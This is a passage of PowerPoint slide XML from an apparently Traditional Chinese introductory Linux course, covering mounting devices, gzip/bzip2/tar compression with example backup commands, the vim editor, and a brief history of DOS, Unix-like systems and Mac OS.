              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>由於PC的服務對象為ㄧ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>般的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>單一使用者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，因此，在CPU及主記憶體方面的管理需求不多，反而是需要對於磁碟提供較多的管理，引此命名為DOS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7135452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掛戴檔案系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di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n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hdc6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ount /dev/hdc6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n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hdc6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9342699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掛戴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V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光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di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media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rom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mount –t iso9660 /dev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rom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media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rom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mount /dev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rom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media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ro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9002922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掛戴隨身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disk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l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di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n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flash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mount –t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fa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o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ocharse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=cp950 /dev/sda1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n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flas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4141602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六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與檔案系統壓縮與打包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346189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和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un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除了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的壓縮格式外，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系統下更常見的是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的壓縮格式，這種檔案一般是由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所產生。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具有將許多檔案壓縮成一個檔案的功能，但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卻不能，所以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一般會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一起使用。目前，大部分或見到的壓縮檔案都是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將所有檔案打包成一個檔案，再用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行壓縮，所以我們所看到的擴展名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tar.gz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gz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檔案，大多數就是這種類型的檔案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2738525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.tar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>：以 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>tar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>指令打包的檔案。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>gz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>：以 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>gzip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指令壓縮的檔案。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>.tar.gz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.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>tgz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>：以 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>tar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>指令打包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再使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>gzip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指令壓縮的檔案。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>.bz2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>：以 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>bzip2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>指令壓縮的檔案。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>.tar.bz2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>：以 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>tar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>指令打包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再使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>bzip2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>指令壓縮的檔案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862201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壓縮及解壓縮檔案，無選項參數時執行壓縮操作，壓縮產生後綴名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”.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壓縮檔案，並刪除源檔案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i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【選項】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|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解壓縮檔案，相當於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unz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v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顯示檔案的壓縮比例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ca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名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z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查看檔案內容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119320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gunzip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>指令用於執行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>gzip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>指令的逆操作，執行解壓縮，並將壓縮後的檔案還原到原始檔案，使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>gzip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> -d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>指令也可完成解壓縮。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>格式：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>gunzip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>目錄</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>參數</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>-v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：顯示檔案的壓縮比例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836320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zip2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壓縮及解壓縮檔案，無選項參數時執行壓縮操作，壓縮產生後綴名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”.bz2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壓縮檔案，並刪除源檔案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zip2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【選項】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|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lang="en-US" altLang="zh-TW" sz="1100" dirty="0"/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解壓縮檔案。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1100" dirty="0"/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v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顯示檔案的壓縮比例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zca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名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bz2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查看檔案內容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05839947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bunzip2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>指令用於執行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>bzip2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>指令的逆操作，執行解壓縮，並將壓縮後的檔案還原到原始檔案，使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>bzip2 -d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>指令也可完成解壓縮。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>格式：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>bunzip2 【</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>選項</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>】</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" smtClean="0"/>
              <a:t>目錄</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="140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46896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>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux和FreeBSD都是將</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>UNIX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>移植到PC上的解決方案，並且採用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>開放原始碼</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的方式進行推廣。其</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>指令大部分皆與UNIX相同</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，使得一般無法購買工作站及大型主機的使用者，也能享有UNIX的穩定性。這類作業系統通稱為UNIX-LIKE作業系統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4794624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cp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> -r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 /hosts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>gzip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> hosts</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" alt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zip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> -d  hosts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47975502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cp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ervices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/services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> bzip2  services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> bzip2  -d  servic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30725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磁帶文件收集指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tape archive retrieve command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可針對目錄的完整結構建立一個檔案，預設輸出至磁帶內，同時也可以指定到任何檔案或設備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語法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 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tcvf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 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檔案名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路徑或檔案名稱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xtract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解出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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>   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顯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內容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c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reat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建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※ </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="1400" b="1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t</a:t>
            </a:r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等上述參數同時間僅能擇一執行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  v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執行任何動作顯示詳細內容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 f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a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檔名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9242846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一般</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>上常用的壓縮方式是選用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>tar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>將許多檔案打包成一個檔案，再以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>gizp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>壓縮指令壓縮成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>xxx.tar.gz(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>或稱為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>xxx.tgz)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的檔案。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2639026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ar -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>zpcv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> -f /root/etc.tar.gz /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>tar -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>jpcv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> -f /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>etcback</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>/etc.tar.bz2 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>tar -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>jxv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> -f /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>etcback</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>/etc.tar.bz2 -C /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>tmp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-p(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>小寫</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：保留備份資料的原本權限與屬性，常用於備份</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(-c)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>重要的設定檔</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>-P(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>大寫</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：保留絕對路徑，亦即允許備份資料中含有根目錄存在之意；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7718586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七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vim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程式編輯器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5094092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多數</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>系統中預設的文字編輯器</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>大量的快速鍵指令</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>簡單的程式語法除錯機制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9161398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所有的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Unix Like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>系統都會內建 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>vi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>文書編輯器，其他的文書編輯器則不一定會存在。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>很多個別軟體的編輯介面都會主動呼叫 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>vi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>vim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>具有程式編輯的能力，可以主動的以字體顏色辨別語法的正確性，方便程式設計。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>因為程式簡單，編輯速度相當快速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5234855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vim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>可以用顏色或底線等方式來顯示一些特殊的資訊。 舉例來說，當你使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>vim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>去編輯一個 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>C </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>程式語言的檔案，或者是我們後續會談到的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>shell script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>腳本程式時，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>vim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>會依據檔案的副檔名或者是檔案內的開頭資訊， 判斷該檔案的內容而自動的呼叫該程式的語法判斷式，再以顏色來顯示程式碼與一般資訊。也就是說， 這個 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>vim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>是個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>『</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>程式編輯器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>』</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>啦！甚至一些 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>基礎設定檔內的語法，都能夠用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>vim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>來檢查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45925340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vi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>原本是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Unix </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>的文書編輯器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後來 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>也延用了此傳統的編輯器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因此許多人習慣以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>vi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>檔案名稱指令來編輯文件。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>vim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>編輯器會將註解、變數等文字加上顏色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讓使用者可以方便地編輯設定檔、程式碼等檔案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59329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TW" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>麥金塔電腦</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的作業系統Mac OSㄧ直都是由蘋果公司自行開發，Mac OS可以算是圖形化使用者介面(Graphic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Interface;GUI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)的鼻祖，早在1984年，麥金塔電</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>腦就已經開始使用圖形化介面(微軟在1985才開始</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Windows 1.0的開發) ，Mac OS X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>開始使用於</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>BSD Unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>的核心</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t> (Kernel)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>，大大改進記憶體管理，因為外型前衛新穎及效能頗受好評，深受年輕族群愛戴，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>2016</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Apple </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>重新將系統重新命名為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="標楷體"/>
                <a:ea typeface="標楷體"/>
              </a:rPr>
              <a:t>「</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t> Mac OS </a:t>
            </a:r>
            <a:r>
